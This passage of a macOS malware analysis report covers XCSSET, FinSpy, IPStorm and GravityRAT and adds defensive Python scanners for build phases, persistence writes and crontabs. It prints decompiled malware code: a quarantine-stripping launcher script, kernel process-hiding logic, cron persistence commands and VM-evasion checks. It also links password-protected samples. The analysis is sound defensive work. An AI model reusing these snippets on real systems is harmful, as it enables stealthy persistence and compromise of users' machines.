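Since the infection vector is a build phase inside a downloaded project, a developer can audit a project’s project.pbxproj before building it. The following scanner is an added example (not code from this report or from TrendMicro): it pulls each PBXShellScriptBuildPhase out of a pbxproj and flags the traits described above (scripts under xcuserdata, hidden directories, quarantine stripping via xattr -c, chmod +x, execution from ${PROJECT_FILE_PATH}); the pbxproj excerpt is constructed, and the dropped script is the four-line one shown earlier.

```python
"""Audit the shell-script build phases of an Xcode project.pbxproj.

Added example (not from the report or TrendMicro): a pre-build check that
flags build phases of the kind OSX.XCSSET plants. The sample project
contents below are constructed for illustration.
"""
import re
from typing import Dict, List

# Constructed project.pbxproj excerpt: one benign lint phase, one phase that
# runs a script from a hidden directory under xcuserdata (modeled on the
# infection described in the report, NOT a real infected project).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        AA11 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "\"${PODS_ROOT}/SwiftLint/swiftlint\" --quiet\n";
        };
        BB22 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "sh \"${PROJECT_FILE_PATH}/xcuserdata/.xcassets/Assets.xcassets\"\n";
        };
/* End PBXShellScriptBuildPhase section */
'''

# The second-stage script the report shows inside the hidden .xcassets/ dir.
SAMPLE_DROPPED_SCRIPT = '''cd "${PROJECT_FILE_PATH}/xcuserdata/.xcassets/"
xattr -c "xcassets"
chmod +x "xcassets"
./xcassets "${PROJECT_FILE_PATH}" true
'''

# Each object in a pbxproj looks like:  ID /* comment */ = { ... };
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-F]+) /\* (?P<name>[^*]*) \*/ = \{(?P<body>.*?)\n[ \t]*\};',
    re.DOTALL,
)
# shellScript is a C-style escaped string; match up to the unescaped quote.
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

# Heuristics tied to what an XCSSET-style build phase has to do.
INDICATORS = [
    (re.compile(r'xcuserdata'), 'runs code from xcuserdata (per-user state, not source)'),
    (re.compile(r'/\.[^/\s"]+'), 'references a hidden path component'),
    (re.compile(r'\bxattr\s+-c\b'), 'strips extended attributes (quarantine flag)'),
    (re.compile(r'\bchmod\s+\+x\b'), 'marks a file executable at build time'),
    (re.compile(r'\$\{?PROJECT_FILE_PATH\}?'), 'executes content stored inside the .xcodeproj bundle'),
]


def _unescape(s: str) -> str:
    """Undo the backslash escaping pbxproj applies to string values."""
    out, i = [], 0
    while i < len(s):
        if s[i] == '\\' and i + 1 < len(s):
            out.append({'n': '\n', 't': '\t'}.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def scan_script(script: str) -> List[str]:
    """Return the human-readable indicators that fire on a shell script."""
    return [why for rx, why in INDICATORS if rx.search(script)]


def scan_pbxproj(text: str) -> List[Dict]:
    """Return every PBXShellScriptBuildPhase with its script and findings."""
    results = []
    for m in PHASE_RE.finditer(text):
        body = m.group('body')
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        sm = SCRIPT_RE.search(body)
        script = _unescape(sm.group(1)) if sm else ''
        results.append({
            'id': m.group('id'),
            'name': m.group('name'),
            'script': script.strip(),
            'findings': scan_script(script),
        })
    return results


if __name__ == '__main__':
    for phase in scan_pbxproj(SAMPLE_PBXPROJ):
        verdict = 'SUSPICIOUS' if phase['findings'] else 'ok'
        print(f"{phase['id']} ({phase['name']}): {verdict}")
        for why in phase['findings']:
            print('   -', why)
    print('dropped script indicators:', scan_script(SAMPLE_DROPPED_SCRIPT))
```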
Some notable plugins mentioned in the report include:

screen: takes screenshots of an infected system.
encrypter: encrypts (ransoms) users’ files (via AES in CBC mode).
replicator: infects local Xcode projects with its malicious code.

👾 OSX.FinSpy

FinSpy is a commercial cross-platform implant, supporting a myriad of cyber espionage features & capabilities.

Download: OSX.FinSpy (password: infect3d)

The malware was discovered by Amnesty International, as seen in the tweet by Claudio Guarnieri, their “Head of Security Lab”:

Sometimes threat intel is hard, sometimes folks leave all FinFisher samples exposed on a webserver. So here ya go, along with recent Windows and Android, we're publishing details on new FinFisher for Mac OS 🍎 and Linux 🐧. https://t.co/eakdBWcYbF
— nex (@botherder@mastodon.social) (@botherder) September 25, 2020

Titled “German-made FinSpy spyware found in Egypt, and Mac and Linux versions revealed,” the Amnesty International writeup detailed FinFisher’s spyware suite (FinSpy), including “previously undisclosed versions for Linux and MacOS computers”.

As noted in their report:

"FinSpy is a commercial spyware suite produced by the Munich-based company FinFisher Gmbh. Since 2011 researchers have documented numerous cases of targeting of Human Rights Defenders (HRDs) - including activists, journalists, and dissidents with the use of FinSpy in many countries, including Bahrain, Ethiopia, UAE, and more."

Writeups:
“FinFisher Filleted 🐟”
“The Finfisher Tales, Chapter 1: The dropper”
“German-made FinSpy spyware found in Egypt, and Mac and Linux versions revealed”

Infection Vector: Unknown

Amnesty International uncovered “a server located at the IP address 158.69.105[.]207” …hosting various FinSpy samples, including a macOS
variant:

[Figure: FinSpy Server (credit: Amnesty International)]

Unfortunately there was no clear indication of how (macOS) targets were infected.

Commercial spyware is often sold to customers, who are then responsible for figuring out how to deploy the software to (read: infect) targets of interest. Such customers may (separately) purchase exploits, or craft their own social engineering campaigns to compromise their targets.

However, we should note that the malware was distributed as a disk image, containing a single item: an application bundle named Install Çağlayan:

/Volumes/caglayan-macos/Install Çağlayan.app

…with a bundle identifier of com.coverpage.bluedome.caglayan.desktop.installer:

$ cat "/Volumes/caglayan-macos/Install Çağlayan.app/Contents/Info.plist"
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>

    <key>CFBundleExecutable</key>
    <string>Install Çağlayan</string>

    <key>CFBundleIdentifier</key>
    <string>com.coverpage.bluedome.caglayan.desktop.installer</string>
    ...
  </dict>
</plist>

This may indicate that the malware was distributed as a trojanized application, or perhaps was attempting to masquerade as a legitimate application (perhaps for the Turkish news(?)
site, Çağlayan (caglayandergisi.com)).

Persistence: Launch Agent

If the malicious application (Install Çağlayan.app) is run, it will eventually execute an installer (that was copied to ~/Library/Caches/org.logind.ctp.archive/installer).

As noted in the Amnesty writeup, this installer performs three actions:

1. Copies plugins and config files to /Library/Frameworks/Storage.framework.
2. Copies the launcher (logind) to /private/etc/logind.
3. Persists the launcher, by creating a launch agent plist: /System/Library/LaunchAgents/logind.plist.

Let’s take a closer look at it now, to highlight the code responsible for these actions.

The org.logind.ctp.archive/installer is a Mach-O binary, rather similar to (albeit simpler than) its parent, .log/ARA0848.app/Contents/MacOS/installer. (For example, both contain a custom GIFileOps class that implements various file-related methods (copy:to:, loadAgent, etc.).)

This (next stage) installer’s main method starts at 0x000000010a3d95ac. The logic in the main function first checks for the presence of various files (plugins?), such as /Library/Frameworks/Storage.framework and /Contents/Resources/7f.bundle/Contents/Resources/AAC.dat.
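All three of the installer’s actions write into privileged, persistence-related locations, which is something a file monitor can flag generically. The following detector is an added example (not from this report or from Amnesty International): it consumes newline-delimited JSON notifications in the shape emitted by Endpoint-Security-based monitors such as Objective-See’s FileMonitor (an "event" name plus a "file" object with "destination" and, for renames, "source"); the events are constructed, with paths that mirror the three actions above and a placeholder process path and pid.

```python
"""Flag file-system events that land in macOS persistence locations.

Added example (not from the report or Amnesty International). Input is
newline-delimited JSON in the shape Endpoint Security based monitors such
as Objective-See's FileMonitor emit; that shape is assumed here. The
events below are constructed: the paths follow the FinSpy installer's three
actions, the process path and pid are placeholders.
"""
import json
import re
from collections import defaultdict
from typing import Dict, Iterable, List

SAMPLE_EVENTS = r'''
{"event":"ES_EVENT_TYPE_NOTIFY_RENAME","file":{"destination":"/Users/user/Documents/report.txt","source":"/Users/user/Documents/draft.txt"},"process":{"path":"/System/Applications/TextEdit.app/Contents/MacOS/TextEdit","pid":4000}}
{"event":"ES_EVENT_TYPE_NOTIFY_RENAME","file":{"destination":"/Library/LaunchAgents/logind.plist","source":"/Users/user/Library/Caches/org.logind.ctp.archive/logind.plist"},"process":{"path":"/Users/user/Library/Caches/org.logind.ctp.archive/installer","pid":1234}}
{"event":"ES_EVENT_TYPE_NOTIFY_RENAME","file":{"destination":"/private/etc/logind","source":"/Users/user/Library/Caches/org.logind.ctp.archive/logind"},"process":{"path":"/Users/user/Library/Caches/org.logind.ctp.archive/installer","pid":1234}}
{"event":"ES_EVENT_TYPE_NOTIFY_RENAME","file":{"destination":"/System/Library/Extensions/logind.kext","source":"/Users/user/Library/Caches/org.logind.ctp.archive/logind.kext"},"process":{"path":"/Users/user/Library/Caches/org.logind.ctp.archive/installer","pid":1234}}
{"event":"ES_EVENT_TYPE_NOTIFY_RENAME","file":{"destination":"/Library/Frameworks/Storage.framework","source":"/Users/user/Library/Caches/org.logind.ctp.archive/storage.framework"},"process":{"path":"/Users/user/Library/Caches/org.logind.ctp.archive/installer","pid":1234}}
{"event":"ES_EVENT_TYPE_NOTIFY_CREATE","file":{"destination":"/Users/user/Library/LaunchAgents/com.example.sync.plist"},"process":{"path":"/Applications/SyncTool.app/Contents/MacOS/SyncTool","pid":5555}}
'''

# Event types that put a (new) file at "destination".
WRITE_EVENTS = {
    'ES_EVENT_TYPE_NOTIFY_RENAME',
    'ES_EVENT_TYPE_NOTIFY_CREATE',
    'ES_EVENT_TYPE_NOTIFY_WRITE',
}

# Where a file landing means "something will run later, or with privilege".
PERSISTENCE_RULES = [
    (re.compile(r'^/(?:System/)?Library/Launch(?:Agents|Daemons)/'), 'system launch item'),
    (re.compile(r'^/Users/[^/]+/Library/LaunchAgents/'), 'user launch agent'),
    (re.compile(r'^/(?:System/)?Library/Extensions/'), 'kernel extension'),
    (re.compile(r'^/(?:private/)?etc/'), 'system configuration directory'),
    (re.compile(r'^/Library/Frameworks/'), 'system-wide framework'),
]
# Sources that suggest the file was staged (unpacked/decrypted) just before.
STAGING_RE = re.compile(r'/Library/Caches/|^/(?:private/)?tmp/')


def classify(path: str) -> str:
    """Name the persistence category a destination path falls into ('' if none)."""
    for rx, label in PERSISTENCE_RULES:
        if rx.match(path):
            return label
    return ''


def analyze_events(lines: Iterable[str]) -> List[Dict]:
    """Return one alert per write into a persistence location."""
    alerts = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        evt = json.loads(line)
        if evt.get('event') not in WRITE_EVENTS:
            continue
        dest = evt.get('file', {}).get('destination', '')
        label = classify(dest)
        if not label:
            continue
        src = evt['file'].get('source', '')
        alerts.append({
            'line': n,
            'pid': evt.get('process', {}).get('pid'),
            'process': evt.get('process', {}).get('path', ''),
            'destination': dest,
            'category': label,
            'staged': bool(src and STAGING_RE.search(src)),
        })
    return alerts


def installer_like(alerts: List[Dict], min_categories: int = 2) -> Dict[int, List[str]]:
    """pids that touched several distinct persistence categories; that spread
    (launch item + binary + kext + framework) is the installer's signature."""
    seen = defaultdict(set)
    for a in alerts:
        seen[a['pid']].add(a['category'])
    return {pid: sorted(cats) for pid, cats in seen.items() if len(cats) >= min_categories}


if __name__ == '__main__':
    found = analyze_events(SAMPLE_EVENTS.splitlines())
    for a in found:
        flag = ' (staged from cache/tmp)' if a['staged'] else ''
        print(f"line {a['line']}: pid {a['pid']} wrote {a['category']}: {a['destination']}{flag}")
    for pid, cats in installer_like(found).items():
        print(f"pid {pid} looks like an installer: {', '.join(cats)}")
```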
It then builds a dictionary of key-value pairs via a call to [GIPath installationMap]:

$ lldb org.logind.ctp.archive/installer
...
* thread #1, queue = 'com.apple.main-thread'
installer`main:
-> 0x10a3da37e <+3538>: callq *0x6d04(%rip) ;objc_msgSend
(lldb) x/s $rsi
0x10a3df5c7: "installationMap"
(lldb) ni
(lldb) po $rax
{
  "/Users/user/Library/Caches/org.logind.ctp.archive/Storage.framework"
    → "/Library/Frameworks/Storage.framework";
  "/Users/user/Library/Caches/org.logind.ctp.archive/logind"
    → "/private/etc/logind";
  "/Users/user/Library/Caches/org.logind.ctp.archive/logind.kext"
    → "/System/Library/Extensions/logind.kext";
  "/Users/user/Library/Caches/org.logind.ctp.archive/logind.plist"
    → "/Library/LaunchAgents/logind.plist";
}

As we can see in the debugger output, this maps files from the decrypted, uncompressed archive (org.logind.ctp.archive) to their final destinations.

The installer then iterates over each of these files, and via a block (at 0x000000010a3da4d2) moves them from the archive to their (final) destinations:

files = [GIPath installationMap];
[files enumerateKeysAndObjectsUsingBlock:^(KeyType src, ObjectType dest, BOOL *stop)
{
    [GIFileOps move:src to:dest];
    [GIFileOps setStandardAttributes:dest];
}];

We can passively observe this via our File Monitor:

# FileMonitor.app/Contents/MacOS/FileMonitor -pretty -filter installer
{
  "event" : "ES_EVENT_TYPE_NOTIFY_RENAME",
  "file" : {
    "destination" : "/Library/LaunchAgents/logind.plist",
    "source" : "/Users/user/Library/Caches/org.logind.ctp.archive/logind.plist"
  }
}
{
  "event" : "ES_EVENT_TYPE_NOTIFY_RENAME",
  "file" : {
    "destination" : "/private/etc/logind",
    "source" :
"/Users/user/Library/Caches/org.logind.ctp.archive/logind"
  }
}
{
  "event" : "ES_EVENT_TYPE_NOTIFY_RENAME",
  "file" : {
    "destination" : "/System/Library/Extensions/logind.kext",
    "source" : "/Users/user/Library/Caches/org.logind.ctp.archive/logind.kext"
  }
}
{
  "event" : "ES_EVENT_TYPE_NOTIFY_RENAME",
  "file" : {
    "destination" : "/Library/Frameworks/Storage.framework",
    "source" : "/Users/user/Library/Caches/org.logind.ctp.archive/storage.framework"
  }
}

Let’s take a closer look at the logind.plist:

$ cat /Library/LaunchAgents/logind.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>org.logind</string>
    <key>ProgramArguments</key>
    <array>
        <string>/private/etc/logind</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <dict>
        <key>SuccessfulExit</key>
        ...
    </dict>
</dict>
</plist>

As the RunAtLoad key is set to true, the binary /private/etc/logind will be automatically (re)executed each time the system is rebooted and the user logs in.

Once the installer has, well, installed (and setuid’d) these various components, it kicks off this persistent launch agent via a call to [GIFileOps loadAgent:].

This method simply invokes launchctl with the load command line argument, and the path to the logind.plist:

+(char)loadAgent:(char *)plist {

    task = [[NSTask alloc] init];
    [task setLaunchPath:@"/bin/launchctl"];
    args = [NSArray arrayWithObjects:@"load", plist, 0x0];
    [task setArguments:args];

    [task launch];
    [task waitUntilExit];
    ...
}

The persistent implant (/private/etc/logind) is now off and running!

Capabilities: Persistent Implant with plugin-based modules and a kernel-level rootkit

Amnesty’s writeup details the capabilities of FinSpy, noting such capabilities are implemented via plugins:

"FinSpy for Mac OS ...follow(s) a
modular design. The launcher `logind` only instantiates the core component `dataPkg`, which oversees communications with the Command and Control server (C&C), and decrypting/launching modules when needed. The modules are encrypted with the AES algorithm and compressed with the `aplib` compression library. The AES key is stored in the binary, but the IV is stored in each configuration file along with a MD5 hash of the final decompressed file."

The rather extensive list of modules available to the spyware include:

[Figure: list of FinSpy modules]

Another interesting capability of this malware is its kernel-mode rootkit functionality. Simply put, (public) macOS malware with ring-0 capabilities is rare!

The file logind.kext is FinSpy’s kernel extension …though it is unsigned:

$ codesign -dvv org.logind.ctp.archive/logind.kext/Contents/MacOS/logind
logind.kext/Contents/MacOS/logind: code object is not signed at all

As the kernel extension is unsigned, it won’t run on any recent version of macOS (which enforces kext code signing requirements).

In terms of its functionality, it appears to be a simple process hider.

In a function named ph_init, the kernel extension looks up a bunch of kernel symbols (via a function named ksym_resolve_symbol_by_crc32):

void ph_init() {

    rax = ksym_resolve_symbol_by_crc32(0x127a88e8, rsi, rdx, rcx);
    *_ALLPROC_ADDRESS = rax;

    ...

    rax = ksym_resolve_symbol_by_crc32(0xfffffffffef1d247, rsi, rdx, rcx);
    *_LCK_LCK = rax;
    if (rax != 0x0)
        *_LCK_LCK = *rax;

    ...

    rax = ksym_resolve_symbol_by_crc32(0x392ec7ae, rsi, rdx, rcx);
    *_LCK_MTX_LOCK = rax;
    if (rax != 0x0)
        *_LCK_MTX_UNLOCK = ksym_resolve_symbol_by_crc32(0x2472817c, rsi, rdx, rcx);

    return;
}

Based on variable names, it appears that logind.kext is attempting to resolve the pointer of
the kernel’s global list of proc (process) structures, as well as various locks.

In a function named ph_hide the kext will hide a process. This is done by walking the list of proc structures (pointed to by _ALLPROC_ADDRESS), and looking for the one that matches (to hide):

void _ph_hide(int arg0) {

    r14 = arg0;
    if (r14 == 0x0) return;

    r15 = *_ALLPROC_ADDRESS;
    if (r15 == 0x0) return;

SEARCH:

    rax = proc_pid(r15);
    rbx = *r15;
    if (rax == r14) goto HIDE;

loc_15da:
    r15 = rbx;
    if (rbx != 0x0) goto SEARCH;

    return;

HIDE:
    r14 = *(r15 + 0x8);
    (*_LCK_MTX_LOCK)(*_LCK_LCK);
    *r14 = rbx;
    *(rbx + 0x8) = r14;
    (*_LCK_MTX_UNLOCK)(*_LCK_LCK);
    return;
}

In the above code, note that HIDE contains the logic to remove the target process of interest, by unlinking it from the (process) list. Once removed, the process is now (relatively) “hidden”. (Of course one can leverage XNU-level APIs to uncover such process hiding.)

The malicious kext also appears to be able to communicate with user-mode via the file /tmp/launchd-935.U3xqZw. Specifically, in a function named ksym_init, it will open and read in the contents of this file (which may contain details of the process to hide?):

void ksym_init(int arg0, int arg1) {
    *(int32_t *)_MKI_SIZE = fileio_get_file_size("/tmp/launchd-935.U3xqZw", arg1);
    rax = _OSMalloc_Tagalloc("MKI", 0x0);
    *_MKI_TAG = rax;
    if (rax == 0x0) goto .l1;

loc_1898:
    rax = _OSMalloc(*(int32_t *)_MKI_SIZE, rax);
    *_MKI_BUFFER = rax;
    if (rax == 0x0) goto loc_1921;

loc_18b2:
    if (fileio_read_file_fully("/tmp/launchd-935.U3xqZw", rax) == 0x0) goto loc_1908;

    ....
}

👾 IPStorm

IPStorm is a cross-platform botnet, now ported to macOS.
Though its capabilities are limited on macOS, it supports a reverse shell, ad fraud, and more.

Download: IPStorm (password: infect3d)

In early October researchers at Intezer published a report about IPStorm being ported from Windows to Linux… and also macOS:

"Our research team recently identified new Linux variants of IPStorm targeting various Linux architectures (ARM, AMD64, Intel 80386) and platforms (servers, Android, IoT). We have also detected a macOS variant." -Intezer

The macOS version of IPStorm is packed with the UPX packer. Luckily we can use UPX itself (via the -d flag) to completely unpack the malware:

$ ./upx -d IPStorm
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.09        Markus Oberhumer, Laszlo Molnar & John Reiser   Feb 18th 2013
With LZMA support, Compiled by Mounir IDRASSI (mounir@idrix.fr)

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
  20172924 <-   8216592   40.73%   Mach/AMD64    IPStorm

Unpacked 1 file.

…once unpacked, analysis can commence.

Writeups:
“A Storm is Brewing: IPStorm Now Has Linux Malware”
“GravityRAT and IPStorm: Mac Malware, Ported from Windows”

Infection Vector: SSH Brute Forcing(?)

It is not clear how IPStorm infects macOS systems. However, the Intezer report notes that the malware can spread via SSH brute-forcing:

"The [malware] attempts to spread and infect other victims on the internet by using SSH brute-force. Once a connection is established ...it will proceed to download the payload and infect the server." -Intezer

At address 00000000046e70b0 we find a function named storm/scan_tools/ssh.brute …that, if it successfully brute-forces an SSH connection to a remote system, will call storm/scan_tools/ssh.InstallPayload.
This function will ascertain the architecture of the (newly) accessed system (via a call to storm/scan_tools/ssh.SystemInfo.GoArch), and then proceeds to download the appropriate payload (via storm/statik.GetFileContents).

Once the payload has been downloaded to the remote system, IPStorm invokes a function named ssh.(*Session).Start …which eventually calls runtime.newproc to (likely) kick off the payload on the remote system.

int ssh.InstallPayload(...) {

    ssh.SystemInfo.GoArch(...);

    statik.GetFileContents(...);

    ssh.(*Session).Start(...);

}

Persistence: None(?)

While the Windows and Linux versions of IPStorm will persist, it does not appear that the macOS version supports persistence.

The Intezer report details a function in the Linux variant, filetransfer.(*File).Persist, that “archives persistence”.

We find this same function in the macOS version (at address 0x004491620) …however it does not appear to contain any persistence logic, but instead references the string "Persist not implemented on platform %s":

;filetransfer.(*File).Persist
...
lea rax, qword [0x4910358] ;"Persist not implemented on platform %s"

Moreover, executing the malware (in a virtual machine) does not generate any persistent events.

Capabilities: Remote Shell, Ad Fraud, etc...

During their analysis of the Linux variant, the Intezer researchers noted that IPStorm would create a reverse shell via functions named backshell.*.

We find these same functions in the macOS variant:

[Figure: backshell.* functions]

Taking a peek at the backshell.openLocalShell function reveals it invoking powershell.(*Backend).StartProcess …passing in bash:

int storm/backshell.openLocalShell(...)
{
    ...

    //0x48ed0be -> "bash"
    storm/powershell.(*Backend).StartProcess(..., 0x48ed0be, ...);

}

Looking at sockets on an infected system (via our tool Netiquette), we find that the malware has created a listening socket on a high port:

[Figure: Listening Socket]

…this might indicate that the malware creates a listener socket in process to facilitate the reverse shell (and perhaps then passes the commands to bash to execute).

In the Intezer report, the researchers noted that the Linux version of IPStorm also engages in fraudulent activities:

"IPStorm’s Linux variant takes advantage of its being widespread to perform different fraudulent activity in the background, abusing gaming and ads monetization. Because it’s a botnet, the malware utilizes the large amount of requests from different trusted sources, thus not being blocked nor traceable." -Intezer

By sniffing network traffic we can confirm that the macOS variant also engages in such activities …specifically fraudulent ad monetization:

[Figure: Fraudulent Ad Monetization]

…to a large number of remote IP addresses (though some may be other members of the botnet, or SSH brute-force attempts):

[Figure: So ... Many ... Connections]

👾 GravityRAT

GravityRAT is a cross-platform remote administration tool (RAT …backdoor) now ported to macOS. The (available) samples are persistent first-stage downloaders.

Download: GravityRAT (password: infect3d)

In October, Kaspersky published a new report on the intriguing cross-platform spyware, GravityRAT ("used to target the Indian armed forces").
In this report, they noted that for the first time, “there are now versions for … macOS”.

The Kaspersky report mentioned several samples (of trojanized applications) that were all persistent first-stage downloaders:

$ shasum OSX.GravityRAT/*
086b22075d464b327a2bcbf8b66736560a215347 ~/OSX.GravityRAT/Enigma
696c7cbba2c9326298f3ddca5f22cfb20a4cd3ee ~/OSX.GravityRAT/OrangeVault
e33894042f3798516967471d0ce1e92d10dec756 ~/OSX.GravityRAT/StrongBox
9b5b234e3b53f254bc9b3717232d1030e340c7f2 ~/OSX.GravityRAT/TeraSpace

…here, we’ll focus mainly on the Enigma sample (086b22075d464b327a2bcbf8b66736560a215347) and the StrongBox sample (e33894042f3798516967471d0ce1e92d10dec756).

Writeups:
“GravityRAT: The spy returns”
“Adventures in Anti-Gravity (Part 1)”
“Adventures in Anti-Gravity (Part 2)”

Infection Vector: Trojanized Applications

Kaspersky’s report notes that (at least one sample of) the Windows version was “downloaded from the site enigma.net[.]in under the guise of a secure file sharing app to protect against ransomware”.
The macOS version (Enigma) also appears to masquerade as such an application:

[Figure: Enigma's user interface]

It’s unknown how the user is coerced into downloading and running the trojanized application, but if they do, they may end up infected.

…may, as the sample(s) are unsigned:

$ for i in OSX.GravityRAT/*; do codesign -dvvv $i; done
OSX.GravityRAT/Enigma: code object is not signed at all
OSX.GravityRAT/OrangeVault: code object is not signed at all
OSX.GravityRAT/StrongBox: code object is not signed at all
OSX.GravityRAT/TeraSpace: code object is not signed at all

…meaning that on recent versions of macOS, Gatekeeper will block them (unless the user manually removes the quarantine attribute, or, if distributed in a .pkg, clicks through various warnings).

Persistence: Cron Job (of a 2nd-stage payload)

The samples themselves don’t appear to persist. However, (2nd-stage) payloads that are downloaded are persisted (by the malware).

The Kaspersky report notes, “The Mac version …adds a cron job”.

For the Enigma sample, we find this persistence logic in a function named format:

def format(self, src, des, uc):
    ...
    if not os.path.isfile(des):
        os.system('cp ' + src + ' ' + des)
        if des[-3:] == '.py':
            os.system('sudo crontab -l 2>/dev/null; echo "*/2 * * * * python ' + des + '" | sudo crontab -')
        else:
            os.chmod(des, 448)
            des += ' ' + uc
            os.system('sudo crontab -l 2>/dev/null; echo "*/2 * * * * ' + des + '" | sudo crontab -')
    return '+O '

Via crontab the malware persists a downloaded file (a 2nd-stage payload) as a cron job.
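Persistence of this kind leaves a recognizable trace in the user’s (or root’s) crontab. The following audit script is an added example (not from this report or from Kaspersky): it parses `crontab -l` output and flags entries with an every-few-minutes schedule that hand a script to an interpreter, or run a binary from, a user-writable staging location such as ~/Library/Application Support. The crontab lines are constructed, and the payload file names are placeholders (the actual 2nd-stage payloads were never recovered).

```python
"""Audit crontab entries for the kind of persistence GravityRAT installs.

Added example (not from the report or Kaspersky): parses the output of
`crontab -l` and flags entries that fire every few minutes and run an
interpreter on, or a binary from, a user-writable staging location. The
entries below are constructed; the payload names are placeholders.
"""
import re
import shlex
from typing import Dict, List, Optional

SAMPLE_CRONTAB = '''# m h dom mon dow command
0 3 * * * /usr/bin/find /Users/user/Downloads -mtime +30 -delete
*/2 * * * * python /Users/user/Library/Application Support/SCloud/update.py
*/2 * * * * "/Users/user/Library/Application Support/SCloud/agent" --task 7A
@daily /usr/local/bin/backup.sh
'''

INTERPRETERS = {'python', 'python3', 'python2', 'sh', 'bash', 'zsh', 'osascript', 'perl', 'node'}
# App Support / Caches / tmp / hidden directories: writable without privilege.
STAGING_RE = re.compile(
    r'/Library/(?:Application Support|Caches)/|(?:^|[\s"\'])/(?:private/)?tmp/|/\.[^/\s"\']+'
)
SPECIALS = {'@reboot', '@hourly', '@daily', '@weekly', '@monthly', '@yearly', '@annually'}
MAX_MINUTES = 5   # */N with N <= 5, or a bare '*', counts as high-frequency


def parse_entry(line: str) -> Optional[Dict]:
    """Split a crontab line into schedule and command; None for comments/env lines."""
    line = line.strip()
    if not line or line.startswith('#') or re.match(r'^[A-Za-z_][A-Za-z0-9_]*=', line):
        return None
    if line.startswith('@'):
        sched, _, cmd = line.partition(' ')
        if sched not in SPECIALS:
            return None
        return {'schedule': sched, 'command': cmd.strip()}
    fields = line.split(None, 5)          # five time fields, then the command
    if len(fields) < 6:
        return None
    return {'schedule': ' '.join(fields[:5]), 'command': fields[5]}


def audit_entry(entry: Dict) -> List[str]:
    """Return the reasons an entry looks like malware persistence (empty if none)."""
    reasons = []
    sched, cmd = entry['schedule'], entry['command']
    minute = sched.split()[0]
    m = re.fullmatch(r'\*/(\d+)', minute)
    if minute == '*' or (m and int(m.group(1)) <= MAX_MINUTES):
        reasons.append(f'high-frequency schedule ({sched})')
    if sched == '@reboot':
        reasons.append('runs at boot')
    try:
        tokens = shlex.split(cmd)         # honours the quoting scheduleMac-style entries use
    except ValueError:
        tokens = cmd.split()
    if tokens and tokens[0].rsplit('/', 1)[-1] in INTERPRETERS:
        reasons.append(f'interpreter {tokens[0]} given a script to run')
    if STAGING_RE.search(cmd):
        reasons.append('target lives in a user-writable staging location')
    return reasons


def audit_crontab(text: str) -> List[Dict]:
    """Return the entries that triggered at least one reason."""
    flagged = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry is None:
            continue
        reasons = audit_entry(entry)
        if reasons:
            flagged.append({'line': n, **entry, 'reasons': reasons})
    return flagged


if __name__ == '__main__':
    for hit in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {hit['line']}: {hit['schedule']}  {hit['command']}")
        for r in hit['reasons']:
            print('   -', r)
```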
This malicious cron job is set to run every two minutes (*/2 * * * *).

The StrongBox sample also persists a downloaded file, via a function named scheduleMac, which persists (and launches) the downloaded payload as a cron job via the builtin crontab command:

function scheduleMac(fname,agentTask)
{
    ...
    var poshellMac = loclpth+"/"+fname;
    execTask('chmod -R 0700 ' + "\"" + + "\"" );

    ...
    arg = agentTask;
    execTask('crontab -l 2>/dev/null; echo \' */2 * * * * ' + "\"" +poshellMac + "\" " + arg + '\' | crontab -', puts22);
}

…the persisted payload will be (re)launched every two minutes (*/2 * * * *).

Capabilities: 1st-stage downloader

The macOS GravityRAT samples appear to simply be 1st-stage downloaders …as they reach out to remote command & control servers to download (and persist) 2nd-stage payloads.

Before downloading and persisting the next-stage payloads though, the malware performs several checks (implemented in the main.js file):

Check if running in a VM
Check if not connected to the Internet
Check if not running with Full Disk Access (FDA)

Let’s take a closer look at each of these.

The aptly named function, VMCheck, checks if the application is running within a Virtual Machine.
Virtual machine checks are commonly found in malware, in an attempt to ascertain if a malware analyst is (likely) examining the code (in a virtual machine).

function VMCheck(stdout) {

    if (stdout.includes("innotek GmbH") ||
        stdout.includes("VirtualBox") ||
        stdout.includes("VMware") ||
        stdout.includes("Microsoft Corporation" ||
        stdout.includes("HITACHI"))) {

        axios.post(srdr, {
            value: 'vm',
            status: true
        })

        ...

        const options = {
            type: 'question',
            buttons: ['Ok'],
            defaultId: 2,
            title: 'StrongBOX - Operation Not Permitted in VirtualBOX',
            message: 'Action Required',
            detail: 'StrongBOX - Unable to load components\nPlease exit virtual mode to launch the application.'
        };

        dialog.showMessageBox(null, options, (response, checkboxChecked) => {
            app.quit();
            app.exit();
        });

…pretty easy to see it’s checking if the passed-in parameter (stdout) contains strings related to popular virtual machine products (e.g. VMware). So what’s in the stdout parameter? Well, if the malware is running on a macOS system, the VMCheck function will be invoked from within a function named Vmm:

function Vmm() {
    var modname = exec("system_profiler SPHardwareDataType | grep 'Model Name'");
    var smc = exec("system_profiler SPHardwareDataType | grep 'SMC'");
    var modid = exec("system_profiler SPHardwareDataType | grep 'Model Identifier'");
    var rom = exec("system_profiler SPHardwareDataType | grep 'ROM'");
    var snum = exec("system_profiler SPHardwareDataType | grep 'Serial Number'");
    VMCheck(modname + smc + modid + rom + snum);
}

The Vmm function gets system-identifying information such as the model name, model identifier, serial number and more.
If executed within a virtual machine, this information will contain VM-related strings:

